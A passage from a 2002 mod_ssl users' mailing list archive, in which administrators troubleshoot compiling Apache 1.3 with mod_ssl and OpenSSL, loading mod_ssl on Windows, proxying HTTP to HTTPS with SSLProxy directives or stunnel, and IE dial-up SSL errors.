static char const sccsid[] = "@(#) mod_ssl/" MOD_SSL_VERSION " >";
static char const rcsid[]  = "$Id: mod_ssl/" MOD_SSL_VERSION " $";
----------------------------------------------------------------------------
----------------------

Just followed many procedures and the error remain the same.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org








______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 09:20:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA22645; Thu, 25 Jul 2002 09:19:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from psa-relay3.mpsa.com id JAA22621; Thu, 25 Jul 2002 09:18:57 +0200 (MET DST)
From: abdel.ramli@mpsa.com
Received: from aigti2.domino.inetpsa.com ([192.168.2.25]) by
          psa-relay3.mpsa.com (Netscape Messaging Server 4.15) with ESMTP
          id GZSN0F01.CYQ; Thu, 25 Jul 2002 09:19:27 +0200 
Subject: =?iso-8859-1?Q?R=E9f=2E_=3A_RE=3A_R=E9f=2E_=3A_RE=3A_Problem_with_ssl?=
X-Mailer: Lotus Notes Release 5.0.8  June 18, 2001
Message-ID: 
Date: Thu, 25 Jul 2002 09:18:37 +0200
To: modssl-users@modssl.org
Cc: "'modssl-users@modssl.org'" ,
        owner-modssl-users@modssl.org
X-MIMETrack: Serialize by Router on AIGTI2.DOMINO/S/PSA(Release 5.0.8 |June 18, 2001) at
 25/07/2002 09:18:40 AM
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA22624
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: abdel.ramli@mpsa.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi Coates,

Concerning the error message I used to get when trying to compile mod_SSL,
I'ld like to get u posted concerning that error.
I followed the same steps than yours, Coates, and nothing worked just
because I wanted openssl & Apache to be installed into a specific
directories :
So I added a --prefix option to it, and this was sufficient to make my
Apache installation crash.
For Apache it is OK but it looks like it doesn't support openssl to be
elsewhere than in its default directory.

Anyway it seems it works Ok for now, as I


Thanx to all;

Abdel

                         \\\___///
                         \\  _ _  //
                       (  @ @  )
+-------------------oOOo-(_)-oOOo--------------------+

Abdel RAMLI
abdel.ramli@mpsa.com
Consultant Altaïr Technologies
PSA Peugeot Citroën | site de Bessoncourt
Unité: DINQ/DSIN/INSI/ETSO/PRD
Tel : 03 84 46 92 79 (229279)
+--------------------------- ---Oooo-------------------+
                       oooO        (  )
                       (  )         )/
                        \(         (_)
                        (_)


                                                                                                                        
                    "Carter, Coates"                                                                                    
                                 
                    mond.edu>                 cc :    "'abdel.ramli@mpsa.com'"                    
                    Envoyé par :              Objet : RE: Réf. : RE: Problem with ssl                                   
                    owner-modssl-users@                                                                                 
                    modssl.org                                                                                          
                                                                                                                        
                                                                                                                        
                    24/07/2002 21:47                                                                                    
                    Veuillez répondre à                                                                                 
                    modssl-users                                                                                        
                                                                                                                        
                                                                                                                        




Abdel,

What is the error message?  You wrote that the error was on line 76 of
mod_ssl.c, but I don't believe you mentioned the error message itself.
I've
just installed mod_ssl on apache on RedHat 7.2, all the same versions as
you.  I didn't have any errors or problems.  I chose to use the latest
openssl, which added a few more lines of work form me.  I've included for
you my notes from my installation.  Good luck.

Coates Carter
University of Richmond

#OPENSSL- REMOVE OLD RPM AND INSTALL LATEST TARBALL
rpm -e --repackage --nodeps openssl
cd /usr/local/src
gzip -dc openssl-0.9.6d.tar.gz |tar xvf -
cd /usr/local/src/openssl-0.9.6d
more INSTALL
./config shared
make
make test
make install
mv /usr/lib/libssl.so /usr/lib/libssl.so.old
mv /usr/lib/libcrypto.so /usr/lib/libcrypto.so.old
ln -s /usr/local/ssl/lib/libssl.so.0.9.6 /usr/lib/libssl.so
ln -s /usr/local/ssl/lib/libssl.so.0.9.6 /usr/lib/libssl.so.2
ln -s /usr/local/ssl/lib/libssl.so.0.9.6 libssl.so.0.9.6
ln -s /usr/local/ssl/lib/libcrypto.so.0.9.6 /usr/lib/libcrypto.so
ln -s /usr/local/ssl/lib/libcrypto.so.0.9.6 /usr/lib/libcrypto.so.2
ln -s /usr/local/ssl/lib/libcrypto.so.0.9.6 libcrypto.so.0.9.6
ln -s /usr/local/ssl/bin/openssl /usr/bin/openssl

#MM- BUILD THE SOURCE (www.engelschall.com/sw/mm)
cd /usr/local/src
gzip -dc mm-1.1.3.tar.gz|tar xvf -
cd /mm-1.1.3
./configure
make

#MOD_SSL- INSTALL NEW PATCH TO APACHE SOURCE
cd /usr/local/src
gzip -dc apache_1.3.26.tar.gz|tar xvf -
gzip -dc mod_ssl-2.8.10-1.3.26.tar.gz |tar xvf -
cd mod_ssl-2.8.10-1.3.26
./configure --with-apache=/usr/local/src/apache_1.3.26

#APACHE- INSTALL NEW TARBALL
cd /usr/local/src/apache_1.3.26
SSL_BASE=SYSTEM; EAPI_MM=../mm-1.1.3
./configure --prefix=/usr/local/apache --enable-module=ssl
--enable-shared=ssl
make
tar cvf /usr/local/apache.020724.tar /usr/local/apache
/usr/local/apache/bin/apachectl stop
#NOTE: INSTALL SSL CERTIFICATE AND KEY NOW, IF NOT ALREADY THERE
make install
/usr/local/apache/bin/apachectl startssl
#......THAT'S ALL IT TAKES......





-----Original Message-----
From: abdel.ramli@mpsa.com [mailto:abdel.ramli@mpsa.com]
Sent: Wednesday, July 24, 2002 3:17 AM
To: Frederic DONNAT
Subject: Réf. : RE: Problem with ssl



Hi Fred,
That's exactly what I meant by patched (as we may consider that mod_ssl is
not more than a patch applied to Apache source to modify it.

I just keep getting that error.
Please, help if you can.

Thanx







                    "Frederic DONNAT"

                    

                    encod.com>               cc :

                                             Objet : RE: Problem with ssl

                    23/07/2002 18:45











Hi Abdel


What do you mean by "patched"?

The classic way is :
[root]# cd mod_ssl-2.8.10-1.3.26
[root]# ./configure --prefix=/path_where_to_install_apache \
--with-apache=/path_to_apache_src --with-ssl=/path_to_openssl_src
[root]# cd /path_to_apache_src
[root]# make
[root]# make install

That's for a dynamic build.

Type the following command line before for a static one:
export LDFLAGS="-ldl"

Be sure to have the rigth openssl installed.

Hope it will help
Fred

-----Original Message-----
From:   abdel.ramli@mpsa.com [mailto:abdel.ramli@mpsa.com]
Sent:   Tue 07/23/2002 5:06 PM
To:     modssl-users@modssl.org
Cc:     owner-modssl-users@modssl.org
Subject:        Problem with ssl


*Hi all

I'm trying to get mod_ssl work with Apache on RedHat 7.2, with Apache
1.3.26 & mod_ssl-2.8.10-1.3.26


I just keep getting an error on line 76 of the mod_ssl.c while compiling
apache (patched with mod_ssl)

which is :

----------------------------------------------------------------------------

----------------------
 *  identify the module to SCCS `what' and RCS `ident' commands
 */
static char const sccsid[] = "@(#) mod_ssl/" MOD_SSL_VERSION " >";
static char const rcsid[]  = "$Id: mod_ssl/" MOD_SSL_VERSION " $";
----------------------------------------------------------------------------

----------------------

Just followed many procedures and the error remain the same.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org








______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 09:33:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA23515; Thu, 25 Jul 2002 09:32:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-ulis.ulis.zencod.com id JAA23486; Thu, 25 Jul 2002 09:31:45 +0200 (MET DST)
Subject: =?iso-8859-1?Q?RE_=3A_R=E9f=2E_=3A_RE=3A_R=E9f=2E_=3A_RE=3A_Problem_with_?=
	=?iso-8859-1?Q?ssl?=
Date: Thu, 25 Jul 2002 09:31:27 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Message-ID: 
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: =?iso-8859-1?Q?R=E9f=2E_=3A_RE=3A_R=E9f=2E_=3A_RE=3A_Problem_with_ssl?=
Thread-Index: AcIzq9NMvqbYP6PdTHq/RxHRwPzSVgAARg7Q
From: "Frederic DONNAT" 
To: 
Cc: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA23506
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic DONNAT" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

> So I added a --prefix option to it, and this was sufficient to make my
> Apache installation crash.
> For Apache it is OK but it looks like it doesn't support openssl to be
> elsewhere than in its default directory.

Wrong Abdel !  ;-)
By default OpenSSl directory is /usr/local
On Mdk you can change this to /usr and install apache with mod-ssl wit-h openssl without problem !
I think that depends on your LD_LIBRARY_PATH !

Fred

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 11:42:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA01471; Thu, 25 Jul 2002 11:41:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from dserv1.dnsworld.de id LAA01431; Thu, 25 Jul 2002 11:40:44 +0200 (MET DST)
Received: (qmail 13021 invoked from network); 25 Jul 2002 09:35:27 -0000
Received: from p508d717f.dip.t-dialin.net (HELO knb001) (80.141.113.127)
  by 213.146.160.166 with SMTP; 25 Jul 2002 09:35:27 -0000
Message-ID: <000b01c233bf$5704aed0$eb00a8c0@ATec.local>
From: "Oliver Enders" 
To: 
Subject: Apache & Mod_SSL Cannot load /modules/mod_ssl.so
Date: Thu, 25 Jul 2002 11:40:14 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0008_01C233D0.0A680AC0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Oliver Enders" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0008_01C233D0.0A680AC0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello ervebody,

I=B4ve got the following problem:

I=B4ve installed a apache_1.3.23 with OpenSSL, mod_ssl and mod_jk with =
WIN 2000 everything works fine when the LoadModule for mod_ssl is =
commented out. After including the LoadModule line, i get the following =
Syntax Error:

Syntax error on line 195 of c:/ptc/apache/conf/httpd.conf:
Cannot load /modules/mod_ssl.so into server: (126) Das angegebene Modul =
wurde nicht gefunden:

(Module couldnt be found)=20

But it is the definately there !!

I=B4ve allready set the PATH  in the system variables to /apache/conf/ =
because i thought that might be the problem, but the path in the =
Error-message is absoloute, so it cant be......=20

Has anybody had/solved the same problems ??

Thanx a lot=20

Oliver
------=_NextPart_000_0008_01C233D0.0A680AC0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hello ervebody,


 


I=B4ve got the following =
problem:


 


I=B4ve installed a apache_1.3.23 with =
OpenSSL,=20
mod_ssl and mod_jk with WIN 2000 everything works fine when the =
LoadModule=20
for mod_ssl is commented out. After including the LoadModule line, i get =
the=20
following Syntax Error:


 


Syntax error on line 195 of=20
c:/ptc/apache/conf/httpd.conf:
Cannot load /modules/mod_ssl.so into =
server:=20
(126) Das angegebene Modul wurde nicht gefunden:


 


(Module couldnt be found) 


 


But it is the definately there =
!!


 


I=B4ve allready set the PATH  in =
the system=20
variables to /apache/conf/ because i thought that might be the =
problem,=20
but the path in the Error-message is absoloute, so it cant=20
be...... 


 


Has anybody had/solved the same =
problems=20
??


 


Thanx a lot 


 


Oliver


------=_NextPart_000_0008_01C233D0.0A680AC0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 17:16:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA22439; Thu, 25 Jul 2002 17:15:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from uxe450b.kwe.com id RAA22356; Thu, 25 Jul 2002 17:14:51 +0200 (MET DST)
Received: from diungerich ([10.0.2.83]) by uxe450b.kwe.com
          (Netscape Messaging Server 3.6)  with SMTP id AAA11D7
          for ; Thu, 25 Jul 2002 15:13:30 +0000
From: "David Iungerich" 
To: 
Subject: RE: http to https forward
Date: Thu, 25 Jul 2002 10:14:22 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <20020724224853.GA2356@rawbyte.com>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Iungerich" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Daniel,

Does your book or somewhere else give the specifics of what all I need to do
to get this done.  If so I'll go buy it, or wherever I need to look.  I've
got to get this thing implemented today.  At this point, I'm thinking I'll
strip off the Apache 1.3.23 that came with Suse and install Apache 2.0.
Bear in mind with all of this, that I'm new to Apache and Linux, so any
specifics you can provide on what ALL is need to implment this would be
greatly appreciated.

Thanks again,
David

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Daniel Lopez
Sent: Wednesday, July 24, 2002 5:49 PM
To: modssl-users@modssl.org
Subject: Re: http to https forward


On Wed, Jul 24, 2002 at 05:45:15PM -0500, David Iungerich wrote:
> Thanks Daniel.  What all is needed as adjustments to my conf file?  As I
> understood it, there  was an issue with Apach taking an http POST reqest
and
> encrypting it with a given cert, then sending it along via https.  If you
> could tell me exactly what I need version-wise and what to add/change in a
> standard conf file, I'd greatly appreciate it.

I am not sure I understand what you mean with "encrypting it with a given
cert". I am guessing it means that your client must present a specific
client certificate to the remote server. This SSL functionality was present
in mod_ssl versions for 1.3 if you compiled with SSL_EXPERIMENTAL flag, but
was not working very well.
Apache 2.0 includes robust support for that functionality (thanks to Doug
MacEachern of mod_perl fame) and I recommend you use that. The directive you
want is SSLProxyMachineCertificateFile, for specifying the client
certificate(s) to present to the remote server. It is not documented
currently on the Apache project, but take a look at :
http://www.covalent.net/support/docs/faststart/2.0.0/userguide/html/sslconfi
gure.php#1138492

Hope it helps

Daniel


> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Daniel Lopez
> Sent: Wednesday, July 24, 2002 4:30 PM
> To: modssl-users@modssl.org
> Subject: Re: http to https forward
>
>
>
> > yes, that is correct.  I meant http to https.  So, there is no way to do
> > this with existing mods?  I have to use something else?  Java or Python
> > program?  Anyone already have anything?
>
> You can already do it with Apache 2, and I am pretty sure you can do it
with
> Apache 1.3 too. The directives are just not documented, I am working on a
> patch for the docs. But you are able to do
>
> SSLProxyEngine on
> ProxyPass / https://some.host.com
>
> And you can also use other SSLProxy* directives like SSLProxyVerify, etc.
>
> Daniel
>
> --
> Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 19:50:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA01160; Thu, 25 Jul 2002 19:49:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id TAA01103; Thu, 25 Jul 2002 19:48:48 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 2C68C25189; Thu, 25 Jul 2002 10:39:33 -0700 (PDT)
Date: Thu, 25 Jul 2002 10:39:33 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: http to https forward
Message-ID: <20020725173932.GA6537@rawbyte.com>
References: <20020724224853.GA2356@rawbyte.com> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, Jul 25, 2002 at 10:14:22AM -0500, David Iungerich wrote:
> Daniel,
> 
> Does your book or somewhere else give the specifics of what all I need to do

When the book was released, Doug (who sits 2 cubicles next to me :) had not
yet cleaned up and ported that functionality, so I mention it but could not
give any specifics.

> to get this done.  If so I'll go buy it, or wherever I need to look.  I've
> got to get this thing implemented today.  At this point, I'm thinking I'll
> strip off the Apache 1.3.23 that came with Suse and install Apache 2.0.
> Bear in mind with all of this, that I'm new to Apache and Linux, so any
> specifics you can provide on what ALL is need to implment this would be
> greatly appreciated.

Yesterday I submitted a patch to the Apache docs@ mailing list documenting those
directives. 
I can try and help you with the setup, first step is to get Apache compiled
with SSL support and understand how to generate certificates:
http://www.apacheworld.org/ty24/site.chapter17.html
and the mod_ssl docs/tutorial at apache.org

For the SSLProxy* directives these docs are old and for raven ssl, but apply
for the most part

http://www.covalent.net/support/docs/faststart/2.0.0/userguide/html/sslconfigure.php#1138492

Cheers

Daniel

> Thanks again,
> David
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Daniel Lopez
> Sent: Wednesday, July 24, 2002 5:49 PM
> To: modssl-users@modssl.org
> Subject: Re: http to https forward
> 
> 
> On Wed, Jul 24, 2002 at 05:45:15PM -0500, David Iungerich wrote:
> > Thanks Daniel.  What all is needed as adjustments to my conf file?  As I
> > understood it, there  was an issue with Apach taking an http POST reqest
> and
> > encrypting it with a given cert, then sending it along via https.  If you
> > could tell me exactly what I need version-wise and what to add/change in a
> > standard conf file, I'd greatly appreciate it.
> 
> I am not sure I understand what you mean with "encrypting it with a given
> cert". I am guessing it means that your client must present a specific
> client certificate to the remote server. This SSL functionality was present
> in mod_ssl versions for 1.3 if you compiled with SSL_EXPERIMENTAL flag, but
> was not working very well.
> Apache 2.0 includes robust support for that functionality (thanks to Doug
> MacEachern of mod_perl fame) and I recommend you use that. The directive you
> want is SSLProxyMachineCertificateFile, for specifying the client
> certificate(s) to present to the remote server. It is not documented
> currently on the Apache project, but take a look at :
> http://www.covalent.net/support/docs/faststart/2.0.0/userguide/html/sslconfi
> gure.php#1138492
> 
> Hope it helps
> 
> Daniel
> 
> 
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]On Behalf Of Daniel Lopez
> > Sent: Wednesday, July 24, 2002 4:30 PM
> > To: modssl-users@modssl.org
> > Subject: Re: http to https forward
> >
> >
> >
> > > yes, that is correct.  I meant http to https.  So, there is no way to do
> > > this with existing mods?  I have to use something else?  Java or Python
> > > program?  Anyone already have anything?
> >
> > You can already do it with Apache 2, and I am pretty sure you can do it
> with
> > Apache 1.3 too. The directives are just not documented, I am working on a
> > patch for the docs. But you are able to do
> >
> > SSLProxyEngine on
> > ProxyPass / https://some.host.com
> >
> > And you can also use other SSLProxy* directives like SSLProxyVerify, etc.
> >
> > Daniel
> >
> > --
> > Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 20:23:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA03042; Thu, 25 Jul 2002 20:22:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from DB.Stanford.EDU id UAA03028; Thu, 25 Jul 2002 20:21:50 +0200 (MET DST)
Received: from db.stanford.edu (Blenny.Stanford.EDU [171.64.75.55])
	by DB.Stanford.EDU (8.9.3/8.8.8) with ESMTP id LAA31896
	for ; Thu, 25 Jul 2002 11:19:41 -0700
Message-ID: <3D4041BC.F8F1417D@db.stanford.edu>
Date: Thu, 25 Jul 2002 11:21:48 -0700
From: Gary W 
X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.4.7-10smp i686)
X-Accept-Language: en, ja
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Moving server to SSL: which way?
References:  <1027542557.3d3f0e1dadce1@wd21.dyndns.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Gary W 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have a JDBC server running and would like to make it secure.
I am using XML to support an RMI-like functionality.
Should I implement the SSLSocketClient or use a servlet
and the URL API?

I want an easy (automated) install to the client machines
so do not want them to have to have a certificate,
only the server.

I already have Apache 2 running in SSL mode and JDK 1.4.
It is a prototype, so entensibility is not an issue.

Gary
-- 
Be careful about reading health books. You may die of a misprint.
            -- Mark Twain
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 21:48:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA07747; Thu, 25 Jul 2002 21:47:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail2.alfredstate.edu id VAA07714; Thu, 25 Jul 2002 21:46:43 +0200 (MET DST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: MODSSL - Internet Explorer problems with dial up users.
Date: Thu, 25 Jul 2002 15:46:42 -0400
Message-ID: <5A512C2479958F43A442B37798816F7554BADD@mail2.alfredstate.edu>
Thread-Topic: MODSSL - Internet Explorer problems with dial up users.
Thread-Index: AcI0E//21eLKfGzSQzqxBCHe9D/gBw==
From: "Rahr Carl H" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA07721
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rahr Carl H" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi List!

I'm having a problem with MODSSL specific to 128-cipher strength IE browsers for users who access our college web site via dial-up.  The sites certificate authority is Verisign.  The Apache server (1.3.19) runs a Windows 2000 server and is used to access a database using mod_plsql.

SSL encryption works fine for all computers and browsers (IE and Netscape) that are wired to our campus network.  Dial-up users with IE 128-bit strength browsers receive "Page cannot be displayed".  These users can reach the secure site (encryption icon locked), but have difficulty after entering a user ID and PIN.  If they are lucky enough get past the login they usually have problems anytime they attempt to submit parameters.  Dial-in Netscape users do not have a problem.

My config file has all the necessary IE environment modifications.
In virtual host area:  SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
And in the  area:  BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0

I find it confusing that I can use IE 6 on my laptop on the network and not have a problem, yet when I dial in it does not work.

Any suggestions would be greatly welcomed.

Thanks,

CJ Rahr
Lead Programmer / Analyst
Alfred State College
rahrch@alfredstate.edu




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 26 11:51:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA20760; Fri, 26 Jul 2002 11:50:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lopette.org id LAA20732; Fri, 26 Jul 2002 11:49:35 +0200 (MET DST)
Date: Fri, 26 Jul 2002 02:55:47 -0700
Message-Id: <200207260255.AA85524592@lopette.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "arcean" 
To: 
Subject: RE: http to https forward
X-Mailer: 
X-IMSTrailer: __IMail_7__
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "arcean" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

USE Stunnel it's Really simpe

Ido use it for exactly the same probleme

and i use reciproc - authentification (client&serveur)

good perf on *nix
no so bad on win32 ...

>I have an appserver that needs to POST http requests to another company's
>appserver.  Unfortunately, the particular product we are using has issues
>being able to send https, and the other company requires it.  They have
>issued us certificates to talk to them.  I need to be able to send http POST
>reqests to an Apache webserver, have it encrypt the request with the other
>company's cert, and then pass the POST onto that company's server via https.
>No browser involved.  Eventually, I will need to do the same thing in
>reverse, but initially I just need to be able to send in this direction.
>Can you tell me what all specific entries needed in the conf file to
>implement
>this.  Again, our server http to Apache, then encrypt using cert we were
>given, and Apache to other
>company's server via https.
>
>Apache Vesion is currently 1.3.23 - will update for security issues once we
>can implement this scenario.
>Running on Suse Linux 8.0
>
>Thanks,
>David
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>


__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 26 11:58:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA21137; Fri, 26 Jul 2002 11:57:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lopette.org id LAA21083; Fri, 26 Jul 2002 11:56:11 +0200 (MET DST)
Date: Fri, 26 Jul 2002 03:02:52 -0700
Message-Id: <200207260302.AA87818352@lopette.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "arcean" 
To: 
Subject: Re: http to https forward
X-Mailer: 
X-IMSTrailer: __IMail_7__
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "arcean" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

---------- Original Message ----------------------------------
From: "M.E. Post" 
Reply-To: modssl-users@modssl.org
Date:  Wed, 24 Jul 2002 23:10:15 +0200

BOOOOO 
HISSSSSS 
MICROSOSOFT
BULLSHIT ....

(you search for it :) don't teas me ;) )

>With the risk of booing and hissing but Microsoft ISA Server could do this
